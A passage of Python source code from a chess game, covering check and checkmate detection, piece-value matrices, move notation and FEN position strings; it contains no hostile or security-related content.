if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.black_rooks_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
for i in range(0, 9):
remove = True
if checkmate == False and self.black_queens_inf[i][2] == True and abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0]) == abs(self.black_queens_inf[i][1] - self.white_king_inf[0][1]):
if self.black_queens_inf[i][0] > self.white_king_inf[0][0]:
if self.black_queens_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
else:
if self.black_queens_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
remove = True
if checkmate == False and self.black_queens_inf[i][2] == True:
if self.black_queens_inf[i][0] == self.white_king_inf[0][0]:
if self.black_queens_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_queens_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.black_queens_inf[i][1] == self.white_king_inf[0][1]:
if self.black_queens_inf[i][0] > self.white_king_inf[0][0]:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
else:
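# Otherwise, check whether the black king is attacked by any white piece:
# pawns and knights by direct offset, then bishops, rooks and queens only
# when every square between the piece and the king is empty.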
for i in range(0, 8):
if checkmate == False and self.black_king_inf[0][0] + 1 == self.white_pawns_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_pawns_inf[i][1] and self.white_pawns_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 1 == self.white_pawns_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_pawns_inf[i][1] and self.white_pawns_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
if checkmate == False and self.black_king_inf[0][0] + 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] + 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] + 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] + 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.white_bishops_inf[i][2] == True and abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0]) == abs(self.white_bishops_inf[i][1] - self.black_king_inf[0][1]):
if self.white_bishops_inf[i][0] > self.black_king_inf[0][0]:
if self.white_bishops_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
else:
if self.white_bishops_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.white_rooks_inf[i][2] == True:
if self.white_rooks_inf[i][0] == self.black_king_inf[0][0]:
if self.white_rooks_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_rooks_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_rooks_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.white_rooks_inf[i][1] == self.black_king_inf[0][1]:
if self.white_rooks_inf[i][0] > self.black_king_inf[0][0]:
for j in range(1, abs(self.white_rooks_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.white_rooks_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
for i in range(0, 9):
remove = True
if checkmate == False and self.white_queens_inf[i][2] == True and abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0]) == abs(self.white_queens_inf[i][1] - self.black_king_inf[0][1]):
if self.white_queens_inf[i][0] > self.black_king_inf[0][0]:
if self.white_queens_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
else:
if self.white_queens_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
remove = True
if checkmate == False and self.white_queens_inf[i][2] == True:
if self.white_queens_inf[i][0] == self.black_king_inf[0][0]:
if self.white_queens_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_queens_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.white_queens_inf[i][1] == self.black_king_inf[0][1]:
if self.white_queens_inf[i][0] > self.black_king_inf[0][0]:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
return checkmate
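# Builds an 8x8 matrix of signed piece values (pawn 1, bishop/knight 3, rook 5,
# queen 9, king 100). Pieces of the colour the player controls
# (startup.playing_as_white) are positive and the opponent's are negative;
# row index 0 corresponds to board rank y == 7.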
def convert_pieces_to_matrix(self):
self.piece_value_matrix = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
if startup.playing_as_white == True:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_pawns_inf[i][1]][self.white_pawns_inf[i][0]] = 1
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_bishops_inf[i][1]][self.white_bishops_inf[i][0]] = 3
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_knights_inf[i][1]][self.white_knights_inf[i][0]] = 3
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_rooks_inf[i][1]][self.white_rooks_inf[i][0]] = 5
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_queens_inf[i][1]][self.white_queens_inf[i][0]] = 9
if self.white_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.white_king_inf[0][1]][self.white_king_inf[0][0]] = 100
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_pawns_inf[i][1]][self.black_pawns_inf[i][0]] = -1
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_bishops_inf[i][1]][self.black_bishops_inf[i][0]] = -3
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_knights_inf[i][1]][self.black_knights_inf[i][0]] = -3
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_rooks_inf[i][1]][self.black_rooks_inf[i][0]] = -5
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_queens_inf[i][1]][self.black_queens_inf[i][0]] = -9
if self.black_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.black_king_inf[0][1]][self.black_king_inf[0][0]] = -100
else:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_pawns_inf[i][1]][self.white_pawns_inf[i][0]] = -1
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_bishops_inf[i][1]][self.white_bishops_inf[i][0]] = -3
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_knights_inf[i][1]][self.white_knights_inf[i][0]] = -3
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_rooks_inf[i][1]][self.white_rooks_inf[i][0]] = -5
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_queens_inf[i][1]][self.white_queens_inf[i][0]] = -9
if self.white_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.white_king_inf[0][1]][self.white_king_inf[0][0]] = -100
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_pawns_inf[i][1]][self.black_pawns_inf[i][0]] = 1
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_bishops_inf[i][1]][self.black_bishops_inf[i][0]] = 3
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_knights_inf[i][1]][self.black_knights_inf[i][0]] = 3
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_rooks_inf[i][1]][self.black_rooks_inf[i][0]] = 5
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_queens_inf[i][1]][self.black_queens_inf[i][0]] = 9
if self.black_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.black_king_inf[0][1]][self.black_king_inf[0][0]] = 100
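# Returns the algebraic letter ("P", "N", "B", "R", "Q" or "K") of whichever
# piece currently occupies square (x, y), or "none" if the square is empty.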
def find_piece_name(self, x, y):
found = False
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == x and self.white_pawns_inf[i][1] == y:
found = True
return "P"
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True and self.white_bishops_inf[i][0] == x and self.white_bishops_inf[i][1] == y:
found = True
return "B"
for i in range(0, 10):
if self.white_knights_inf[i][2] == True and self.white_knights_inf[i][0] == x and self.white_knights_inf[i][1] == y:
found = True
return "N"
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True and self.white_rooks_inf[i][0] == x and self.white_rooks_inf[i][1] == y:
found = True
return "R"
for i in range(0, 9):
if self.white_queens_inf[i][2] == True and self.white_queens_inf[i][0] == x and self.white_queens_inf[i][1] == y:
found = True
return "Q"
if self.white_king_inf[0][2] == True and self.white_king_inf[0][0] == x and self.white_king_inf[0][1] == y:
found = True
return "K"
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == x and self.black_pawns_inf[i][1] == y:
found = True
return "P"
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True and self.black_bishops_inf[i][0] == x and self.black_bishops_inf[i][1] == y:
found = True
return "B"
for i in range(0, 10):
if self.black_knights_inf[i][2] == True and self.black_knights_inf[i][0] == x and self.black_knights_inf[i][1] == y:
found = True
return "N"
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True and self.black_rooks_inf[i][0] == x and self.black_rooks_inf[i][1] == y:
found = True
return "R"
for i in range(0, 9):
if self.black_queens_inf[i][2] == True and self.black_queens_inf[i][0] == x and self.black_queens_inf[i][1] == y:
found = True
return "Q"
if self.black_king_inf[0][2] == True and self.black_king_inf[0][0] == x and self.black_king_inf[0][1] == y:
found = True
return "K"
# No piece occupies (x, y).
return "none"
def no_moves(self):
check_mate = self.stale_check_mate()
if check_mate == True:
if startup.white_turn == True:
print("Black wins by Checkmate!")
else:
print("White wins by Checkmate!")
else:
print("It's a draw by stalemate!")
class Notation():
def __init__(self):
pass
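# Builds a move string: pawn pushes become e.g. "e4", pawn captures "exd5"
# (promotions end with a trailing "=", presumably completed elsewhere with the
# promotion piece), and other pieces use piece letter + origin square +
# optional "x" + destination square, e.g. "Ng1f3" or "Ng1xf3".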
def get_notation(self, piece, from_x, from_y, to_x, to_y):
notation_val = "error"
capture = False
if piece == "P":
if to_y == 7 or to_y == 0:
if to_x == from_x and (to_y == from_y + 1 or to_y == from_y - 1 or to_y == from_y + 2 or to_y == from_y - 2):
notation_val = self.get_column(to_x) + self.get_row(to_y) + "="
elif (to_x == from_x + 1 or to_x == from_x - 1) and (to_y == from_y + 1 or to_y == from_y - 1):
notation_val = self.get_column(from_x) + "x" + self.get_column(to_x) + self.get_row(to_y) + "="
else:
if to_x == from_x and (to_y == from_y + 1 or to_y == from_y - 1 or to_y == from_y + 2 or to_y == from_y - 2):
notation_val = self.get_column(to_x) + self.get_row(to_y)
elif (to_x == from_x + 1 or to_x == from_x - 1) and (to_y == from_y + 1 or to_y == from_y - 1):
notation_val = self.get_column(from_x) + "x" + self.get_column(to_x) + self.get_row(to_y)
else:
if startup.white_turn == True:
for i in range(0, len(pieces.black_occupation_x)):
if to_x == pieces.black_occupation_x[i] and to_y == pieces.black_occupation_y[i]:
capture = True
else:
for i in range(0, len(pieces.white_occupation_x)):
if to_x == pieces.white_occupation_x[i] and to_y == pieces.white_occupation_y[i]:
capture = True
if capture == True:
notation_val = piece + self.get_column(from_x) + self.get_row(from_y) + "x" + self.get_column(to_x) + self.get_row(to_y)
else:
notation_val = piece + self.get_column(from_x) + self.get_row(from_y) + self.get_column(to_x) + self.get_row(to_y)
return notation_val
def get_column(self, x):
if x == 0:
return "a"
elif x == 1:
return "b"
elif x == 2:
return "c"
elif x == 3:
return "d"
elif x == 4:
return "e"
elif x == 5:
return "f"
elif x == 6:
return "g"
elif x == 7:
return "h"
def get_column_char(self, x):
if x == "a":
return 0
elif x == "b":
return 1
elif x == "c":
return 2
elif x == "d":
return 3
elif x == "e":
return 4
elif x == "f":
return 5
elif x == "g":
return 6
elif x == "h":
return 7
def get_row(self, y):
# Rows 0-7 map to rank characters "1"-"8"; anything else falls back to "9".
if 0 <= y <= 7:
return str(y + 1)
return "9"
def create_fen_position(self):
fen = "11111111/11111111/11111111/11111111/11111111/11111111/11111111/11111111 w KQkq -"
if pieces.en_passant_x_y[0] != 8 and pieces.en_passant_x_y[1] != 8:
pos = 79
if startup.white_turn == True:
fen = fen[:pos] + self.get_column(pieces.en_passant_x_y[0]) + self.get_row(pieces.en_passant_x_y[1] + 1) + fen[pos + 1:]
else:
fen = fen[:pos] + self.get_column(pieces.en_passant_x_y[0]) + self.get_row(pieces.en_passant_x_y[1] - 1) + fen[pos + 1:]
if pieces.black_king_inf[0][3] == True:
black_queenside_castling = False
black_kingside_castling = False
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][3] == True and pieces.black_rooks_inf[i][0] == 0 and pieces.black_rooks_inf[i][1] == 7:
black_queenside_castling = True
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][3] == True and pieces.black_rooks_inf[i][0] == 7 and pieces.black_rooks_inf[i][1] == 7:
black_kingside_castling = True
if black_queenside_castling == False:
pos = 77
fen = fen[:pos] + fen[pos + 1:]
if black_kingside_castling == False:
pos = 76
fen = fen[:pos] + fen[pos + 1:]
else:
pos = 76
fen = fen[:pos] + fen[pos + 2:]
if pieces.white_king_inf[0][3] == True:
white_queenside_castling = False
white_kingside_castling = False
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][3] == True and pieces.white_rooks_inf[i][0] == 0 and pieces.white_rooks_inf[i][1] == 0:
white_queenside_castling = True
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][3] == True and pieces.white_rooks_inf[i][0] == 7 and pieces.white_rooks_inf[i][1] == 0:
white_kingside_castling = True
if white_queenside_castling == False:
pos = 75
fen = fen[:pos] + fen[pos + 1:]
if white_kingside_castling == False:
pos = 74
fen = fen[:pos] + fen[pos + 1:]
else:
pos = 74
if fen[76] == " ":
fen = fen[:pos] + "-" + fen[pos + 2:]
else:
fen = fen[:pos] + fen[pos + 2:]
pos = 72
if startup.white_turn == True:
fen = fen[:pos] + "w" + fen[pos + 1:]
else:
fen = fen[:pos] + "b" + fen[pos + 1:]
for i in range(0, 8):
if pieces.white_pawns_inf[i][2] == True:
pos = pieces.white_pawns_inf[i][0] + ((7 - pieces.white_pawns_inf[i][1]) * 9)
fen = fen[:pos] + "P" + fen[pos + 1:]
for i in range(0, 10):
if pieces.white_bishops_inf[i][2] == True:
pos = pieces.white_bishops_inf[i][0] + ((7 - pieces.white_bishops_inf[i][1]) * 9)
fen = fen[:pos] + "B" + fen[pos + 1:]
for i in range(0, 10):
if pieces.white_knights_inf[i][2] == True:
pos = pieces.white_knights_inf[i][0] + ((7 - pieces.white_knights_inf[i][1]) * 9)
fen = fen[:pos] + "N" + fen[pos + 1:]
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True:
pos = pieces.white_rooks_inf[i][0] + ((7 - pieces.white_rooks_inf[i][1]) * 9)
fen = fen[:pos] + "R" + fen[pos + 1:]
for i in range(0, 9):
if pieces.white_queens_inf[i][2] == True:
pos = pieces.white_queens_inf[i][0] + ((7 - pieces.white_queens_inf[i][1]) * 9)
fen = fen[:pos] + "Q" + fen[pos + 1:]
if pieces.white_king_inf[0][2] == True:
pos = pieces.white_king_inf[0][0] + ((7 - pieces.white_king_inf[0][1]) * 9)
fen = fen[:pos] + "K" + fen[pos + 1:]
for i in range(0, 8):
if pieces.black_pawns_inf[i][2] == True:
pos = pieces.black_pawns_inf[i][0] + ((7 - pieces.black_pawns_inf[i][1]) * 9)
fen = fen[:pos] + "p" + fen[pos + 1:]
for i in range(0, 10):
if pieces.black_bishops_inf[i][2] == True:
pos = pieces.black_bishops_inf[i][0] + ((7 - pieces.black_bishops_inf[i][1]) * 9)
fen = fen[:pos] + "b" + fen[pos + 1:]
for i in range(0, 10):
if pieces.black_knights_inf[i][2] == True:
pos = pieces.black_knights_inf[i][0] + ((7 - pieces.black_knights_inf[i][1]) * 9)
fen = fen[:pos] + "n" + fen[pos + 1:]
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True:
pos = pieces.black_rooks_inf[i][0] + ((7 - pieces.black_rooks_inf[i][1]) * 9)
fen = fen[:pos] + "r" + fen[pos + 1:]
for i in range(0, 9):
if pieces.black_queens_inf[i][2] == True:
pos = pieces.black_queens_inf[i][0] + ((7 - pieces.black_queens_inf[i][1]) * 9)
fen = fen[:pos] + "q" + fen[pos + 1:]
if pieces.black_king_inf[0][2] == True:
pos = pieces.black_king_inf[0][0] + ((7 - pieces.black_king_inf[0][1]) * 9)
fen = fen[:pos] + "k" + fen[pos + 1:]
pos = 0
while fen[pos] != " ":
if (fen[pos] == "1" or fen[pos] == "2" or fen[pos] == "3" or fen[pos] == "4" or fen[pos] == "5" or fen[pos] == "6" or fen[pos] == "7") and fen[pos + 1] == "1":
fen = fen[:pos] + str(int(fen[pos]) + int(fen[pos + 1])) + fen[pos + 2:]
else:
pos += 1
return fen
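# Resets every piece record to "off the board" (the initial coordinates do not
# matter while the on-board flag is False) and then replays a FEN string:
# stage 0 fills the board squares, stage 1 sets the side to move, stage 2
# restores castling rights and stage 3 the en passant square; stages are
# separated by spaces in the FEN.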
def load_fen_position(self, fen):
pieces.white_pawns_inf = [[0, 1, False, False], [1, 1, False, False], [2, 1, False, False], [3, 1, False, False], [4, 1, False, False], [5, 1, False, False], [6, 1, False, False], [7, 1, False, False]]
